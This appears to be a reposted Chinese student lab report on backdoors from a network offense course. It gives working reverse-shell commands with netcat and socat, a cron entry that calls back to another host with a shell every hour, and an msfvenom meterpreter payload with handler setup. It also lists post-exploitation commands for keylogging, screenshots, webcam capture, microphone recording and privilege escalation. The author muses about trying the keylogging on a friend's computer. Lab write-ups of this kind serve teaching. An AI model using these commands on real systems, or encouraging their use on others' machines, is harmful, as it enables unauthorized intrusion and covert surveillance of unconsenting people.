20154319 《网络对抗技术》后门原理与实践
一、實(shí)驗(yàn)說明
任務(wù)一:使用netcat獲取主機(jī)操作Shell,cron啟動 (0.5分)
任務(wù)二:使用socat獲取主機(jī)操作Shell, 任務(wù)計(jì)劃啟動 (0.5分)
任務(wù)三:使用MSF meterpreter(或其他軟件)生成可執(zhí)行文件,利用ncat或socat傳送到主機(jī)并運(yùn)行獲取主機(jī)Shell(0.5分)
任務(wù)四:使用MSF meterpreter(或其他軟件)生成獲取目標(biāo)主機(jī)音頻、攝像頭、擊鍵記錄等內(nèi)容,并嘗試提權(quán) (2分)
二、基礎(chǔ)問題回答
1.問:例舉你能想到的一個(gè)后門進(jìn)入到你系統(tǒng)中的可能方式?
下載一些破解版的軟件時(shí),軟件內(nèi)部可能會有附帶程序含有惡意代碼;電子郵件內(nèi)的鏈接藏有木馬程序;鏈接公共WiFi是注入木馬程序;u盤拷貝進(jìn)電腦。
2.問:例舉你知道的后門如何啟動起來(win及l(fā)inux)的方式?
?win:通過“Windows->控制面板->管理工具->任務(wù)計(jì)劃程序”,創(chuàng)建任務(wù)。
Linux:可以通過cron來啟動;通過對正常軟件的綁定注入shellcode。
3.問:Meterpreter有哪些給你映像深刻的功能?
截取擊鍵記錄和截圖屏幕,感覺用電腦一直被監(jiān)視。
4.問:如何發(fā)現(xiàn)自己有系統(tǒng)有沒有被安裝后門?
?
使用殺毒軟件查看;定期檢查進(jìn)程管理器。
三、實(shí)驗(yàn)過程
任務(wù)一 ?使用netcat獲取主機(jī)操作Shell,cron啟動
一、Win獲得Linux Shell
1.在Windows下使用指令,查看win主機(jī)IP為:192.168.199.187
ipconfig?
?
?
?
2.windows調(diào)用ncat.exe程序打開監(jiān)聽,監(jiān)聽端口為4319
3.在Linux中使用nc指令的-e參數(shù)反彈連接win
nc #win主機(jī)ip# #端口# -e /bin/sh4. windows下獲得一個(gè)linux shell,可運(yùn)行任何linux指令,如輸入ls:
二、 Linux獲得Win Shell
1. 在Linux下使用指令查看linux主機(jī)IP為:192.168.199.132
ifconfig2.Linux下使用nc指令運(yùn)行監(jiān)聽:
nc -l -p 端口號3. 在windows中使用ncat.exe指令以及-e參數(shù)反彈連接Linux:
?
4. Linux下可看到Windows的命令提示,輸入windows的 ipconfig命令成功查看到windows主機(jī)的IP:
##nc傳輸數(shù)據(jù)(以后可以用來聊天~我在8888端口等你(?_?))
1. windows打開端口4319
2.讓Linux連接到4319端口
3.建立連接后傳輸數(shù)據(jù),可實(shí)現(xiàn)互傳
三、cron啟動
1.Windows->控制面板->管理工具->任務(wù)計(jì)劃程序,創(chuàng)建任務(wù):
2.Linux上cron啟動,在windows系統(tǒng)下監(jiān)聽4319端口:
鍵入指令
crotab –e //-e 表示編輯,按a進(jìn)入編輯界面在最后一行添加
51 * * * * /bin/netcat 192.168.199.187 4319 –e /bin/sh //表示每小時(shí)的第21分鐘反彈連接win第51分鐘后可以輸入指令,例如ls
?
任務(wù)二? 使用socat獲取主機(jī)操作Shell, 任務(wù)計(jì)劃啟動
socat下載地址[https://gitee.com/wildlinux/NetSec/attach_files]
因?yàn)橹皼]有下載,這部分是分開做的。
1.win主機(jī)ip:172.30.3.26
2.Linux主機(jī)ip:172.30.4.219
3.?在windows系統(tǒng)下,輸入命令:
socat.exe tcp-listen:4319 exec:cmd,pty,stderr這里要注意路徑(可以直接將socat.exe拖到小黑框中)。
4.在Linux系統(tǒng)下,輸入命令:
socat - tcp: win主機(jī)ip可以成功獲得一個(gè)cmd shell,可以輸入指令,例如ipconfig
任務(wù)三 ?使用MSF meterpreter生成可執(zhí)行文件,利用ncat或socat傳送到主機(jī)并運(yùn)行獲取主機(jī)Shell。
1.在Linux上輸入指令,生成一個(gè)名稱為4319.exe 后門可執(zhí)行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORT=4319 -f exe >4319.exe?
2.利用ncat傳送文件到windows上,設(shè)置windows接收端口為4319,通過以下指令實(shí)現(xiàn)文件傳輸
nc -l 1234 > filename.out nc host.example.com 1234 < filename.in沒有截圖,沒有截圖,忘記了
3.在Linux下,MSF打開監(jiān)聽進(jìn)程:(可愛的羊??)
msfconsole4.查看并設(shè)置payload,LHOST和LPORT
第一行:進(jìn)入handle模式;
第二行:設(shè)置payload;
第三行:查看當(dāng)前信息狀態(tài)。
第一行:設(shè)置LHOST為192.168.199.132;
第二行:設(shè)置LPORT為4319。
4.輸入exploit命令,開始監(jiān)聽:
exploit5.windows運(yùn)行該后門文件:
6.成功獲取shell權(quán)限:
任務(wù)四? 使用MSF meterpreter獲取截圖、擊鍵記錄、獲取管理員權(quán)限偷看登錄密碼
1.獲取截圖
使用screenshot命令抓圖
?
2.獲取擊鍵記錄
keyscan_start //開始獲取 keyscan_dump //查看3.使用攝像頭進(jìn)行拍照:
webcam_snap?
4.截獲一段音頻
record_mic5.獲得管理員權(quán)限,使用ps命令獲取登錄密碼
meterpreter > getsystem //獲得管理員權(quán)限 meterpreter > ps //獲取登錄密碼?
四、實(shí)驗(yàn)中遇到的問題
1.已經(jīng)解決的問題:第一次使用攝像頭拍照的時(shí)候拍不了,原因是超時(shí)了,重新在win系統(tǒng)運(yùn)行一下就行
2.還在糾結(jié)的問題:不知什么叫積極拒絕???
五、實(shí)驗(yàn)體會
這次實(shí)驗(yàn)感觸很深,讓我以后用電腦都有一種被監(jiān)視的感覺。這次使用Meterpreter還是很有趣的,功能很多,其中擊鍵記錄、偷窺登錄密碼、控制攝像頭等功能,覺得以后可以在朋友的電腦上試試,看起來很高級的樣子,不過實(shí)際操作做起來還算是比較簡單的。由于我的電腦本身就是Windows系統(tǒng),就沒有裝Windows的虛擬機(jī),直接在自己的電腦上做的時(shí)候,從Linux傳4319.exe后門程序到電腦上好幾次都直接消失了,被騰訊的電腦管家直接清理掉了,其實(shí)可以把后門程序設(shè)置在白名單里面就不用關(guān)閉殺毒軟件了,說明這個(gè)后門軟件還是很容易被殺毒軟件發(fā)現(xiàn)并直接清理掉的,用在實(shí)驗(yàn)上還行,實(shí)際上可以成功的幾率還是很低吧。
?
轉(zhuǎn)載于:https://www.cnblogs.com/zwl154319/p/8667155.html
總結(jié)
以上是生活随笔為你收集整理的20154319 《网络对抗技术》后门原理与实践的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 集成显卡与独立显卡的区别
- 下一篇: 黑苹果efi文件_台式机华硕主板黑苹果E